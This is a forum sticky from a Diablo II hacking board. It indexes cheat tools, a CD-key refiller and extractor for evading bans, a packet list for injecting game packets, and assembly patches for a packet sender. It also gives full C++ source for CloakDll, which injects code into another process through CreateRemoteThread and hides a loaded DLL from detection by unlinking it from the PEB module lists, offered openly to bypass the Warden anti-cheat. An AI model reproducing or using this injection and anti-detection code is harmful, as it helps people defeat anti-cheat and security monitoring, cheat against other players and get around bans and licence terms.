BNET Hacking Section Sticky v1.11 [MUST READ]

[_Ace]

Introduction​

First of all I'll introduce you all to the concept and purpose of this thread. This thread will be a sticky "forever" (until v1.12 comes out or something really bad happens) and it will contain every info we have about Battle.net hacks, exploits, bugs and so on.

I suggest that you read the whole sticky or at least have a little look through the index BEFORE making a thread asking for something, because it can be here and people will flame you to death (or burn you).

If you still can't find what you want here, the SEARCH button is your friend, remember to use it everytime you need something, it's free, it's fast and it's useful (and it may save you and the mods some hard time).

If you can't find what you want neither in the sticky nor the search feature, it's time you make a thread (check if there aren't any other threads about that first). Please make the thread's title CLEAR and make ONLY one thread, thank you.

If you have something not found in the sticky and you think we should add it please send a PM to: coolmission or TheAce

1.10 sticky can be found here.

Disclaimer​

BattleForums.com, its staff and its moderatords CANNOT be held responsible for any action Blizzard Enterainment or Battle.net takes against you (including, but not limited to, banning of your account and/or CD-Key). The use of 3rd party programs is AGAINST their Terms of Use and their End User License Agreement. Please use the hacks and exploits found here AT YOUR OWN RISK.
By downloading or using any of the programs found here you agree to this disclaimer.


If the links in this thread are down, check this site:

Mirror Site

Index​

This is what we currently have:

[Full Light Radius + Rain Remover v1.0] by TheAce
Undetectable

Ace's PacketList for 1.10 [Complete + Definitions + Examples] v0.1 by TheAce
Safe as long as you know what you're doing

D2Loader for 1.11 by R1CH
Detectable (or so it seems)

ShowCDKey for 1.11 by Netter + Serby's one working with MPQ's
Safe

Dark_Mage's thoughts about Warden (new Battle.net detection system)
This is just an article, Blizzard can't ban you for reading

1.11 Generic Packet Sender + ASM Source + VB Source by Paul[Le]
Unconfirmed (should be safe if you know what to do and don't send ****ed up packets)

D2 CD-Key Refiller by Onlyer + [How to refill + How to run multiple D2's without dropping by TheAce]
Safe

CloakDll.cpp - Bypassing the Warden Safety Module
Code is safe

EasyMap v3.0b by Netter
Undetectable (I'll update this as soon as Blizzard finds a way of detecting it, so far, there is none)

ManualMap.cpp by Darawk - Antidetection even in injection
ANYTHING that needs to be injected into D2's process can be made undetectable with this code

R1CH's ShowCDkey Utility
Safe

 

[_Ace]

[Full Light Radius + Rain Remover v1.0] by TheAce​

Well, here I am to help you. This is a .txt file (extracted from d2 mpq's and edited) so you can use it and your d2 will show full light radius and will hide the rain totally clientside.

Instructions:
1) Download the zip
2) Extract directly in your d2 folder (so then the .txt files are in the folder "program files\Diablo II\data\global\excel\")
3) Right click on your D2 shortcut -> Properties
4) The target field should look like "C:\Program Files\Diablo II.exe" or with " -w" in case you are using windowed
5) Add " -direct -txt" to your shortcut
6) Close the properties window and open up D2 with that shortcut
7) Make a singleplayer game, then leave it. This will make D2 create some more files in data\global\excel needed to play online
8) Exit the singleplayer game, close D2, now you are ready to use this
9) Get on bnet like you usually do, load up your maphack and enjoy ^^
*) Once you do the singleplayer step you don't have to re-do it unless you reinstall D2 or delete the data folder

So here's the zip:

Download

 

[_Ace]

Ace's PacketList for 1.10 [Complete + Definitions + Examples] v0.1​

This packet list includes definitions and will (pretty soon btw) include examples.
Credits go to Gayak and the "others" that made the first ever packetlists, and to Thohell for creating d2hackit, which I'm using to create the examples and get some extra info.

NOTE: THIS GUIDE WAS MADE FOR 1.10, YOU CAN USE THESE PACKETS WITH 1.11 PACKET SENDER BUT I DON'T KNOW IF 1.11 USES THE SAME PACKETS!!

This list has the following format:

[Starting byte] [Description]
Syntax: [Packet syntax (hex bytes separated by spaces)]
Length: [Number of bytes the packet uses including starting one]
Example: [Example of when this packet is used and what data goes where] <- Not done yet, expect to see it in a week or less

Index:

- Variable types
- SENT packets
- RECV packets [not yet]
- Definitions


Variable types: What kind of data goes inside the packets?

BYTE = XX (from 00 to ff)
WORD = 2 bytes
DWORD = 4 bytes
*char = Array of bytes each representing a letter


SENT packets: What does each packet do?

00 UNKNOWN

01 Walk to coords
Syntax: 01 [WORD x] [WORD y]
Length: 5

02 Walk to entity
Syntax: 02 [DWORD entity kind] [DWORD entity id]
Length: 9

03 Run to coords
Syntax: 03 [WORD x] [WORD y]
Length: 5

04 Run to entity
Syntax: 04 [DWORD entity kind] [DWORD entity id]
Length: 9

05 Cast left skill on coords
Syntax: 05 [WORD x] [WORD y]
Length: 5

06 Cast left skill on unit
Syntax: 06 [DWORD entity kind] [DWORD entity id]
Length: 9

07 Shift-cast left skill on unit
Syntax: 07 [DWORD entity kind] [DWORD entity id]
Length: 9

08 Shift-cast left skill on coords (hold)
Syntax: 08 [WORD x] [WORD y]
Length: 5

09 Cast left skill on unit (hold)
Syntax: 09 [DWORD entity kind] [DWORD entity id]
Length: 9

0a Shift-cast left skill on unit (hold)
Syntax: 0a [DWORD entity kind] [DWORD entity id]
Length: 9

0b UNKNOWN

0c Cast right skill on coords
Syntax: 0c [WORD x] [WORD y]
Length: 5

0d Cast right skill on unit
Syntax: 0d [DWORD entity kind] [DWORD entity id]
Length: 9

0e Shift-cast right skill on unit
Syntax: 0e [DWORD entity kind] [DWORD entity id]
Length: 9

0f Cast right skill (hold) on coords
Syntax: 0f [WORD x] [WORD y]
Length: 5

10 Cast right skill on unit (hold)
Syntax: 10 [DWORD entity kind] [DWORD entity id]
Length: 9

11 Shift-cast right skill on unit (hold)
Syntax: 11 [DWORD entity kind] [DWORD entity id]
Length: 9

12 UNKNOWN

13 Interact with entity (to interact with a unit you have to be relatively close, so use the walk to entity packet first)
Syntax: 13 [DWORD entity kind] [DWORD entity id]
Length: 9

14 Overhead message
Syntax: 14 00 00 [*char message] 00 00 00
Length: Varies (6 + message characters)

15 Chat message
Syntax: 15 01 00 [*char message] 00 00 00
Length: Varies (6 + message characters)

16 Pickup item from ground
Syntax: 16 04 00 00 00 [DWORD item id] [DWORD inv(0) or cursor (1)] (00 00 00 00 picks item to inv, 00 00 00 01 picks item to cursor)
Length: 13

17 Drop item from cursor to ground (item must be on cursor)
Syntax: 17 [DWORD item id]
Length: 5

18 Put item down in buffer
Syntax: 18 [DWORD item id] [DWORD xpos] [DWORD ypos] [DWORD buffer]
Length: 17

19 Pickup item from buffer
Syntax: 19 [DWORD item id]
Length: 5

1a Equip item
Syntax: 1a [DWORD item id] [WORD body position] 00 00
Length: 9

1b Equip/Remove 2 handed-item (swap)
Syntax: 1b [DWORD item id] [WORD body position] 00 00
Length: 9

1c Remove item from body
Syntax: 1c [WORD body position]
Length: 3

1d Swap cursor with body
Syntax: 1d [DWORD item id] [WORD body position] 00 00
Length: 9

1e UNKNOWN

1f Swap cursor item with item in buffer
Syntax: 1f [DWORD cursor item id] [DWORD buffer item id] [DWORD xpos] [DWORD ypos]
Length: 17

20 Activate cube/potion in inventory/stash
Syntax: 20 [DWORD item id] [DWORD xpos] [DWORD ypos]
Length: 13

21 Stack items (keys, arrows, bolts)
Syntax: 21 [DWORD item to stack id] [DWORD item where it stacks id]
Length: 9

22 UNKNOWN

23 Drop item to belt
Syntax: 23 [DWORD item id] [DWORD belt position]
Length: 9

24 Pickup item from belt
Syntax: 24 [DWORD item id]
Length: 5

25 Switch item from cursor with item from belt
Syntax: 25 [DWORD cursor item id] [DWORD belt item id]
Length: 9

26 Use potion/scroll in belt
Syntax: 26 [DWORD item id] [DWORD option] 00 00 00 00
Length: 13

27 Identify item
Syntax: 27 [DWORD item id] [DWORD identify scroll id]
Length: 9

28 Socket item (put item inside another)
Syntax: 28 [DWORD item to socket id] [DWORD socketable item id]
Length: 9

29 Put scroll into book
Syntax: 29 [DWORD scroll id] [DWORD book id]
Length: 9

2a Drop item to cube
Syntax: 2a [DWORD item id] [DWORD cube id]
Length: 9

2b UNKNOWN

2c UNKNOWN

2d UNKNOWN

2e UNKNOWN

2f Chat with entity
Syntax: 2f [DWORD entity kind] [DWORD entity id]
Length: 9

30 Terminate entity chat
Syntax: 30 [DWORD entity kind] [DWORD entity id]
Length: 9

31 Quest message
Syntax: 31 [DWORD id] [DWORD message]
Length: 9

32 Buy item from NPC buffer
Syntax: 32 [DWORD entity id] [DWORD item id] [DWORD NPC tab] [DWORD cost (not needed)]
Length: 17

33 Sell item to NPC
Syntax: 33 [DWORD entity id] [DWORD item id] [DWORD NPC tab] [DWORD cost (not needed)]
Length: 17

34 Use NPC to identify items (Cain)
Syntax: 34 [DWORD entity id]
Length: 5

35 Repair item
Syntax: 35 [DWORD entity id] [DWORD item id] [DWORD NPC tab] [DWORD cost (not needed)]
Length: 17

36 Hire merc
Syntax: 36 [DWORD entity id] [DWORD merc id]
Length: 9

37 Identify (probably when gambling an item)
Syntax: 37 [DWORD item id]
Length: 5

38 Entity action
Syntax: 38 [DWORD action] [DWORD entity id] [DWORD parameters/complement]
Length: 13

39 UNKNOWN

3a Add stat point
Syntax: 3a [BYTE stat] 00
Length: 3

3b Add skill point
Syntax: 3b [BYTE skill] 00
Length: 3

3c Select skill
Syntax: 3c [BYTE skill] 00 00 [BYTE left (80) or right (00) skill] FF FF FF FF
Length: 8

3d UNKNOWN (used by Mode5)
Syntax: 3d [DWORD object id]
Length: 5

3e UNKNOWN

3f Play audio message ("help!" and all that)
Syntax: 3f [WORD sound message]
Length: 3

40 Request quest info update (when opening quest window)
Syntax: 40
Length: 1

41 Resurrect (after dying, hitting ESC)
Syntax: 41
Length: 1

42 UNKNOWN

43 UNKNOWN

44 Put staff in orifice (DO NOT PLAY WITH THIS AS IT CAN [AND MOST PROBABLY WILL] CORRUPT YOUR CHARACTER)
Syntax: 44 [DWORD orifice entity kind] [DWORD orifice entity id] [DWORD staff item id] [DWORD entity state]
Length: 17

45 UNKNOWN

46 UNKNOWN

47 UNKNOWN

48 Turn off "busy" state for trades
Syntax: 48
Length: 1

49 Take WP or close WP window
Syntax: 49 [DWORD wp entity id] [BYTE destination] 00 00 00
Length: 9

4a UNKNOWN

4b UNKNOWN

4c UNKNOWN

4d UNKNOWN

4e UNKNOWN

4f Click button (trade buttons for example)
Syntax: 4f [DWORD button id] [WORD complement]
Length: 7

50 Drop gold
Syntax: 50 [DWORD player id] [DWORD gold quantity]
Length: 9

51 Bind hotkey to skill
Syntax: 51 [BYTE skill] [BYTE left (80) or right (00) skill] [WORD hotkey] FF FF FF FF
Length: 9

52 UNKNOWN

53 UNKNOWN

54 UNKNOWN

55 UNKNOWN

56 UNKNOWN

57 UNKNOWN

58 Quest Completed
Syntax: 58 [WORD quest id]
Length: 3

59 Make entity move
Syntax: 59 [DWORD entity kind] [DWORD entity id] [WORD x] 00 00 [WORD y] 00 00
Length: 17

5a UNKNOWN

5b UNKNOWN

5c UNKNOWN

5d Squelch, hostile and "don't let player hear me" stuff
Syntax: 5d [BYTE button] [BYTE toggle on/off] [DWORD player id]
Length: 7

5e Invite to party
Syntax: 5e [BYTE button] [DWORD player id]
Length: 6

5f Update player position
Syntax: 5f [WORD x] [WORD y]
Length: 5

60 Switch inventory (like pressing W)
Syntax: 60
Length: 1

61 Give/take merc item
Syntax: 61 [WORD position (00 00 to give)]
Length: 3

62 Resurrect Merc
Syntax: 62 [DWORD NPC id]
Length: 5

63 Shift left-click item (to belt)
Syntax: 63 [DWORD item]
Length: 5

64 UNKNOWN

65 UNKNOWN

66 Close D2 (instead of leaving game it will make D2 close)
Syntax: 66
Length: 1

67 Enter Game
Syntax: 67 XX XX XX XX XX XX XX XX 00 00 00 00 [*char character name] 00 XX XX XX [DWORD ?]
Length: Varies

68 Leave Game
Syntax: 68
Length: 1

69 UNKNOWN

6c Client Update
Syntax: 6c [DWORD timer in miliseconds] [DWORD delay]
Length: 9

Definitions: What does each packet parameter mean?

[WORD x]
2 bytes containing a x coordinate (first byte is usually "zone" and second is coord inside that zone)

[WORD y]
Same than x but with y coordinate

[DWORD entity kind]

[DWORD entity id]
Every entity in the game has its own id, it's like its identification number that makes it different from other entities...

[*char message]
Group of characters containing the message, 1 byte per letter (hex ASCII)

[DWORD item id]
Every item has its own id, it's the same thing that happens with entities

[DWORD xpos]
x position in a buffer starting from 0 (XX 00 00 00) (when putting an item, the coords define the upper-left corner of the item). Inventory goes from x=0 to x=9

[DWORD ypos]
y position in a buffer starting from 0 (YY 00 00 00) (when putting an item, the coords define the upper-left corner of the item). Inventory goes from y=0 to y=3

[DWORD buffer]
00 00 00 00 = Inventory

[WORD body position]
01 00 = Head
02 00 = Amulet
03 00 = Armor
04 00 = Left hand
05 00 = Right hand
06 00 = Left ring
07 00 = Right ring
08 00 = Belt
09 00 = Boots
0a 00 = Gloves

[DWORD belt position]
0c 0d 0e 0f
08 09 0a 0b
04 05 06 07
00 01 02 03 <- Lower line (the one you always see)

[DWORD option]
UNKNOWN

[DWORD NPC tab]
When buying it's always 00 00 00 00, when selling it varies

[DWORD cost]
When sniffing, it will tell you how much buying an item costed (in hex), when sending the packet it's not needed

[DWORD merc id]
As entities and items, mercs also have ids, nothing to say.

[BYTE stat]
00 = Strength
01 = Energy
02 = Dexterity
03 = Vitality

[BYTE skill]
Every skill has its "id", from 00 to FF (note: some assassin skills are out of that range, being [XX 01], when this happens, XX will go in the [BYTE skill] place, and the 01 will add to the next byte. I know this is not clear enough but I'll explain in next "releases" or edits of this post.

[WORD soundmessage]
19 00 = Help [0]
1a 00 = Follow me [1]
1b 00 = This is yours [2]
1c 00 = Thanks [3]
1d 00 = Sorry [4]
1e 00 = Bye [5]
1f 00 = DIE! [6]
20 00 = Run [7]

This PacketList was made by TheAce, you can copy it and post it anywhere else as long as you state that I did it. If you edit it, you still have to say that the original was made by me.
CM, if you are around, sticky this or something, but leave it editable because I'll be adding stuff everyday. I hope the PacketList helps people who want to start with hacking but don't know where to start.

 

[_Ace]

D2Loader for 1.11 by R1CH [WARNING: DETECTABLE]​

This is just 1.10 loader modified to "work" with 1.11.
It doesn't have the Warden responses implemented so it will make you drop from games and will most likely get you banned.

USE THIS AT YOUR OWN RISK (I recommend that you only get this in case you want a NO-CD crack for singleplayer and open battle.net ONLY, using this on closed may get you banned)

Instructions:
1) Unzip into Diablo II directory.
2) Create shortcut.
3) Done.

Download

 

[_Ace]

ShowCDKey for 1.11 by Netter + Serby's one working with MPQ's​

---------------
showcdkey
by Jan Miller
---------------


showcdkey will extract classic key, expansion key and key owner details from your original diablo ii installation


--
Requirements:

Win95+ (tested on windowsxp sp2)



--
Installation:

1) unzip showcdkey.exe to your d2 install folder
2) run showcdkey.exe



--
Contact:

webmaster@gamemunchers.net
www.gamemunchers.net

Download

Some dude made another little tool that will let you see the CD-Keys in mpq files, here we go:

I made this one from netter's code.
It can show cd-key in any MPQ file (I saw that many of you wanted that).
After downloading you have to copy it in diablo's folder and start it.
Ah, and you can't use mpq names that are longer than 19 characters.

Mirror1: http://www.gamemunchers.net/d2skey.zip
Mirror2: http://www.diablo2hacks.go.ro/d2skey.exe
Mirror3: http://d2hacks.741.com/
Mirror4: http://d2hacks.3x.ro/
Mirror5: http://www.gamehackers.net/forum/attachmen...?attachmentid=5

 

[_Ace]

Dark_Mage's thoughts about Warden (new Battle.net detection system)​

Well, this is the new anti-hacking detection system Blizzard has implemented into Diablo II and WoW.
I've known about it for a while now, but haven't really said anything about it.
All discussion of it (for Diablo II) will go in this thread please.

It is constantly updated server-side and will put a hurting on hackers of Diablo II.
It searches for DLLs loaded in memory used by common hacks.

So, they can pretty much update when new hacks come out and detect/ban hackers uber fast now (over night)...
This is what happened to Netter's Maphack..

Anyone interested in researching it, open up D2Client.dll ...

Text strings referenced in D2Client:.text, item 627
 Address=6FB0261E
 Disassembly=PUSH D2Client.6FB86160
 Text string=ASCII "..\Source\D2Client\WARDEN\WardenClient.cpp"

It's not like ub3rhard to find or anything... :\

Some info:

I think the server sends 0xAE with a list of DLLs to look for in memory and then the client returns 0x66 which declares wether they were found or not and flags you for bannage.

I think it also sends 0xB0 and drops you from the game if you don't return 0x66 (I think this is why people with 2 d2s were getting dropped)...

I'm not confirming this though.

Actually, I think I'm just going to stop researching this as I probably will never play D2 again.
So, if anyone out there wants to research this, please do.

I currently have Netter looking into it.

I forgot to mention that you should also watch for the server sending 0x8F and the client returning 0x6D (the new ping packets) because there is also something with those that checks memory.

Jan (Netter) is working on a way to hiding the DLL's through "playing" with kernel32.dll. I'll post more about this whenever I get any news.

 

[_Ace]

1.11 Generic Packet Sender + ASM Source + VB Source by Paul[Le]​

Paul[Le] from www.gamehackers.net wrote an ASM packet sender. He released ASM Source, a small proof of concept Visual Basic application and that application's source code.

Here's the ASM code:

##################################################  #########################

;Documented by Paul[Le] On Aug 10, 2005

##################################################  #########################

Notes to self!

#hotkey
;:6FACAB43 8B7708     mov esi, dword ptr [edi+08]
;:6FACAB46 33D2        xor edx, edx
;:6FACAB48 B938C3BB6F     mov ecx, 6FBBC338
;:6FACAB66 3DDF000000     cmp eax, 000000DF
#caves
;:6FB7DD6D 00000000000000000000 BYTE 10 DUP(0)

;9 byte packets are built here!
;* Referenced by a CALL at Addresses:
;|:6FAC78CB   , :6FADE3B5   , :6FAE5C0F   , :6FAFE640   , :6FB4591C  
;|:6FB472C5   , :6FB4F5BB   , :6FB4F5CD   , :6FB62968   , :6FB62A81  
;|:6FB62B50   , :6FB62C01   , :6FB62D3C   , :6FB62EF2   , :6FB62F56  
;|:6FB63016   , :6FB6314D   , :6FB63303   , :6FB63367   , :6FB634BE  
;|:6FB63872   , :6FB63884   , :6FB638E0   , :6FB63995   , :6FB63A4C  
;|:6FB64102  
;|
;:6FB23790 83EC0C     sub esp, 0000000C
;:6FB23793 53      push ebx
;:6FB23794 88442404       mov byte ptr [esp+04], al
;:6FB23798 8D442404       lea eax, dword ptr [esp+04]
;:6FB2379C 50      push eax
;:6FB2379D BB09000000     mov ebx, 00000009
;:6FB237A2 894C2409       mov dword ptr [esp+09], ecx
;:6FB237A6 8954240D       mov dword ptr [esp+0D], edx
;:6FB237AA E8B1FAFFFF     call 6FB23260
;:6FB237AF 5B      pop ebx
;:6FB237B0 83C40C     add esp, 0000000C
;:6FB237B3 C3      ret


##################################################  #########################

START "V1.11" "Paul's Generic Packet Sender (Press `)"
6FACAB66 3DDF000000 E802320B00
6FB7DD6D 000000000000 81FEC0000000
6FB7DD73 0000 7512
6FB7DD75 00 60
6FB7DD76 0000000000 B890DDB76F
6FB7DD7B 00 50
#packet_length
6FB7DD7C 0000000000 BB09000000
6FB7DD81 0000000000 E8DA54FAFF
6FB7DD86 00 61
6FB7DD87 0000000000 3DDF000000
6FB7DD8C 00 C3
#packet_to_send
6FB7DD90 ** 13010000000B000000
END

#hotkey
;cmp esi, byte ptr c0 // `
;jne @ Cleanup

#start
;pushad

#build packet
mov eax, packet_to_send
push eax
mov ebx, packet_length
call 6FB23260

#end
;popad

#cleanup
;cmp eax, 000000DF
;ret

Download the Visual Basic proof of concept application

Download the Visual Basic application's source code

 

[_Ace]

D2 CD-Key Refiller by Onlyer + Tutorials

D2 CD-Key Refiller by Onlyer + [How to refill + How to run multiple D2's without dropping by TheAce]​

D2 CD-Key Refiller lets you change your CD-Key (in case you got banned or your friend is using it) AND it lets you make .mpq files for running multiple Diablo II copies with different CD-Keys.

Download

How to refill (change) your current CD-Key:

1) Download the refiller.
2) Extract it in your Diablo II folder (C:\Program Files\Diablo II\ by default).
3) Open auto-cdkey.reg with Notepad (right click -> Edit).
4) Make sure the last 2 lines have the values empty and the mpq files are set like this:
"d2cdkeympq"="d2sfx.mpq"
"d2xcdkeympq"="d2char.mpq"
"d2cdkey"=""
"d2xcdkey"=""
5) Change the "owner" field to whatever you want. Save the file and close it.
6) Double click the auto-cdkey.reg file, it will ask you if you want to add the data to your registry, click OK or YES.
7) Now open the d2-cdkey.exe.
8a) If you want to change your Classic CD-Key (this is the one they ban) click on "CLASSIC CDKEY" (it's in blue text) and type your CD-Key.
8b) If you want to change your LOD CD-Key click on "EXPANSION CDKEY" and put it there.
8c) If you want to change both click on the big "REFILL BOTH CDKEYS" text.
9) Done, this doesn't require D2Loader or anything, you just changed what you wanted to .

How to run multiple D2's without dropping:

This is a long process so make sure you do what I say correctly.

1) Download the refiller.
2) Extract the refiller in your D2 folder.
3) Open auto-cdkey.reg with Notepad (right click -> Edit).
4) Edit the file like this (you can use anything instead of cdkey1.mpq, if this is your second mpq file you can use cdkey2.mpq and so on):
"owner"="YOUR NAME HERE"
"d2cdkeympq"="cdkey1.mpq"
"d2xcdkeympq"="cdkey1.mpq"
"d2cdkey"="CLASSIC CDKEY ->WITHOUT<- DASHES/HYPHENS"
"d2xcdkey"="EXPANSION CDKEY ->WITHOUT<- DASHES/HYPHENS"
So an example would be:
"owner"="Ace"
"d2cdkeympq"="cdkey3.mpq"
"d2xcdkeympq"="cdkey3.mpq"
"d2cdkey"="1234567890123456"
"d2xcdkey"="1234567890123456"
Also make sure both .mpq files are the same (d2cdkeympq and d2xcdkeympq)
5) Run the auto-cdkey.reg file and click YES.
6) Open the refiller, it should do nothing.
7) Now check your D2 dir, there should be a file called cdkey1.mpq (or however you said you wanted it to be in the auto-cdkey.reg file)
8) If you want to make more .mpq files go to Step 4, if not, continue reading (here comes the long stuff).
9) Make one folder for each extra .mpq you are going to use, name them "KEY1", "KEY2", etc. So if you want to run 2 D2's you would only make one folder for the "extra" cdkey because the actual "Diablo II" counts as 1 (I hope you all understand this step, if not, PM me).
10) Copy the following files into each new folder (COPY, not MOVE):
Bnclient.dll
D2CMP.dll
D2Client.dll
D2Common.dll
D2DDraw.dll
D2Direct3D.dll
D2Game.dll
D2Glide.dll
D2Lang.dll
D2Launch.dll
D2Multi.dll
D2Win.dll
D2gfx.dll
D2sound.dll
Fog.dll
Game.exe
Patch_D2.mpq
SmackW32.dll
Storm.dll
binkw32.dll
ijl11.dll
->AND YOUR .MPQ FILE (CDKEY1.MPQ FOR EXAMPLE)<-
11) Download D2Loader for 1.11 (found in this same sticky, it's detectable so as everything, USE IT AT YOUR OWN RISK).
12) Extract the loader into your "Diablo II" folder, rename the original "Diablo II.exe" to something like "Diablo II.bak" because you may need it later on.
13) Now rename "d2loader.exe" into "Diablo II.exe".
14) Create a shortcut to "Diablo II.exe".
15) Now move that shortcut wherever you want to, right click it, then go to Properties.
16) The "Target" field should look like: ""C:\Program Files\Diablo II\Diablo II.exe" -mpq cdkey01.mpq" (you can add other parameters, I'll make a list someday).
17) NOW THIS STEP IS IMPORTANT: The "Execute in" field should be "C:\Program Files\DIablo II\KEY1" assuming the new folder you made was called "KEY1".
18) If you only use 1 extra CD-Key you are done, run both shortcuts and play with 2 Diablo II's happily.
19) If you use more than 1, go back to Step 14 and in the shortcut use cdkey2.mpq, cdkey3.mpq... and in "Execute in" use "KEY2", "KEY3"...
20) You are done .

 

[_CM]

CloakDll.cpp - Bypassing the Warden Safety Module​

Credits go to Dark_Mage- for posting it and Darawk for writing this cute little piece of code.

//		    CloakDll     -	by Darawk	-	RealmGX.com
//
//	The purpose of CloakDll is to allow the user to hide any loaded
//	module from the windows API.  It works by accessing the modules
//	list stored in the PEB, and subsequently unlinking the module
//	in question from all 4 of the doubly-linked lists that it's a
//	node of.  It then zeroes out the structure and the path/file
//	name of the module in memory.  So that even if the memory where
//	the data about this module used to reside is scanned there will
//	still be no conclusive evidence of it's existence.  At present
//	there is only one weakness that I have found in this method.
//	I'll describe how it may still be possible to discover at least
//	that a module has been hidden, after a brief introduction to how
//	the GetModuleHandle function works.
//
//	*The following information is not documented by Microsoft.  This
//	 information consists of my findings while reverse-engineering 
//	 these functions and some of them may be incorrect and/or
//	 subject to change at any time(and is almost definitely different
//	 in different versions of windows, and maybe even in different
//	 service packs).  I've tried to make my code as version independant
//	 as possible but certain parts of it may not work on older versions
//	 of windows.  I've tested it on XP SP2 and there i'll guarantee
//	 that it works, but on any other versions of windows, it's anyone's
//	 guess.*
//
//	GetModuleHandle eventually calls GetModuleHandleExW, which in
//	turn accesses the native API function GetDllHandle, which calls
//	GetDllHandleEx.  And it's not until here, that we actually see
//	anything even begin to look up information about loaded modules.
//	Whenever GetModuleHandle is called, it saves the address of the
//	last ModuleInfoNode structure that it found in a global variable
//	inside of ntdll.  This global variable is the first thing
//	checked on all subsequent calls to GetModuleHandle.  If the
//	handle being requested is not the one that was requested the last
//	time GetDllHandleEx calls the LdrpCheckForLoadedDll function.
//	LdrpCheckForLoadedDll begins by converting the first letter of the
//	module name being requested to uppercase, decrementing it by 1 and
//	AND'ing it with 0x1F.  This effectively creates a 0-based index
//	beginning with the letter 'A'.  The purpose of this is so that
//	the module can first be looked up in a hash table.  The hash table
//	consists entirely of LIST_ENTRY structures.  One for each letter
//	'A' through 'Z'.  The LIST_ENTRY structure points to the first
//	and last modules loaded that begin with the letter assigned to
//	that entry in the hash table.  The Flink member being the first
//	loaded beginning with that letter, and the Blink member being the
//	last.  The code scans through this list until it finds the module
//	that it's looking for.  On the off-chance that it doesn't find it
//	there, or if the boolean argument UseLdrpHashTable is set to false
//	it will begin going through one of the other three lists.  If, at
//	this point it still doesn't find it, it will admit defeat and return
//	0 for the module handle.
//
//	Weakness:  The global variable inside ntdll that caches the pointer
//	to the last module looked up could be used to at least detect the
//	fact that a module has been hidden.  The LdrUnloadDll() function
//	will set this value to 0 when it unloads a module, so if the cache
//	variable points to an empty structure, the only logical conclusion
//	would be a hidden module somewhere in the process.  This could be
//	resolved by using the static address of this variable and simply
//	zeroing it out.  However, this would make the code specific to only
//	one version of windows.  You could also scan the address space of
//	ntdll for any occurences of the base address(aka module handle)
//	of the module you're hiding.  However, this would be slow and it
//	would clutter up the CloakDll_stub function, because it'd have to
//	all be done manually.  And i'd have to either use a static base
//	address for ntdll...which would probably work on most versions
//	of windows, however I really don't like using static addresses.  
//	Or i'd have to manually locate it by writing my own unicode 
//	string comparison code, to lookup ntdll in the list by it's name.
//	Realistically though anyone trying to detect this way would run
//	into the same problem.  That their code would not be version
//	independant.  So, it's unlikely to see any largescale deployment
//	of such a technique.  However, anyone who would like to solve
//	this problem themselves is perfectly free, and encouraged to do
//	so.

#include <windows.h>
#include <winnt.h>
#include <tlhelp32.h>
#include <shlwapi.h>


#pragma comment(lib, "shlwapi.lib")

#define UPPERCASE(x) if((x) >= 'a' && (x) <= 'z') (x) -= 'a' - 'A'
#define UNLINK(x) (x).Blink->Flink = (x).Flink; \
	(x).Flink->Blink = (x).Blink;
	
#pragma pack(push, 1)

typedef struct _UNICODE_STRING {
  USHORT  Length;
  USHORT  MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _ModuleInfoNode
{
	LIST_ENTRY LoadOrder;
	LIST_ENTRY InitOrder;
	LIST_ENTRY MemoryOrder;
	HMODULE baseAddress;		//	Base address AKA module handle
	unsigned long entryPoint;
	unsigned int size;			//	Size of the modules image
	UNICODE_STRING fullPath;
	UNICODE_STRING name;
	unsigned long flags;
	unsigned short LoadCount;
	unsigned short TlsIndex;
	LIST_ENTRY HashTable;	//	A linked list of any other modules that have the same first letter
	unsigned long timestamp;
} ModuleInfoNode, *pModuleInfoNode;

typedef struct _ProcessModuleInfo
{
	unsigned int size;			//	Size of a ModuleInfo node?
	unsigned int initialized;
	HANDLE SsHandle;
	LIST_ENTRY LoadOrder;
	LIST_ENTRY InitOrder;
	LIST_ENTRY MemoryOrder;
} ProcessModuleInfo, *pProcessModuleInfo;


#pragma pack(pop)

bool CloakDll_stub(HMODULE);
void CD_stubend();

bool CloakDll(char *, char *);
unsigned long GetProcessIdFromProcname(char *);
HMODULE GetRemoteModuleHandle(unsigned long, char *);


int main(int argc, char **argv)
{
	CloakDll("notepad.exe", "kernel32.dll");
	return 0;
}

bool CloakDll(char *process, char *dllName)
{
	PathStripPath(dllName);

	unsigned long procId;
	procId = GetProcessIdFromProcname(process);
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procId);

	//	Calculate the length of the stub by subtracting it's address
	//	from the beginning of the function directly ahead of it.
	//
	//	NOTE: If the compiler compiles the functions in a different
	//	order than they appear in the code, this will not work as
	//	it's supposed to.  However, most compilers won't do that.
	unsigned int stubLen = (unsigned long)CD_stubend - (unsigned long)CloakDll_stub;

	//	Allocate space for the CloakDll_stub function
	void *stubAddress = VirtualAllocEx(hProcess, 
		NULL, 
		stubLen, 
		MEM_RESERVE | MEM_COMMIT,
		PAGE_EXECUTE_READWRITE);

	//	Write the stub's code to the page we allocated for it
	WriteProcessMemory(hProcess, stubAddress, CloakDll_stub, stubLen, NULL);

	HMODULE hMod = GetRemoteModuleHandle(procId, dllName);

	//	Create a thread in the remote process to execute our code
	CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)stubAddress, hMod, 0, NULL);

	//	Clean up after ourselves, so as to leave as little impact as possible
	//	on the remote process
	VirtualFreeEx(hProcess, stubAddress, stubLen, MEM_RELEASE);
	return true;
}

bool CloakDll_stub(HMODULE hMod)
{
	ProcessModuleInfo *pmInfo;
	ModuleInfoNode *module;

	_asm
	{
		mov eax, fs:[18h]		// TEB
		mov eax, [eax + 30h]	// PEB
		mov eax, [eax + 0Ch]	// PROCESS_MODULE_INFO
		mov pmInfo, eax
	}

    module = (ModuleInfoNode *)(pmInfo->LoadOrder.Flink);
	
	while(module->baseAddress && module->baseAddress != hMod)
		module = (ModuleInfoNode *)(module->LoadOrder.Flink);

	if(!module->baseAddress)
		return false;

	//	Remove the module entry from the list here
	///////////////////////////////////////////////////	
	//	Unlink from the load order list
	UNLINK(module->LoadOrder);
	//	Unlink from the init order list
	UNLINK(module->InitOrder);
	//	Unlink from the memory order list
	UNLINK(module->MemoryOrder);
	//	Unlink from the hash table
	UNLINK(module->HashTable);

	//	Erase all traces that it was ever there
	///////////////////////////////////////////////////

	//	This code will pretty much always be optimized into a rep stosb/stosd pair
	//	so it shouldn't cause problems for relocation.
	//	Zero out the module name
	memset(module->fullPath.Buffer, 0, module->fullPath.Length);
	//	Zero out the memory of this module's node
	memset(module, 0, sizeof(ModuleInfoNode));	

	return true;
}

__declspec(naked) void CD_stubend() { }

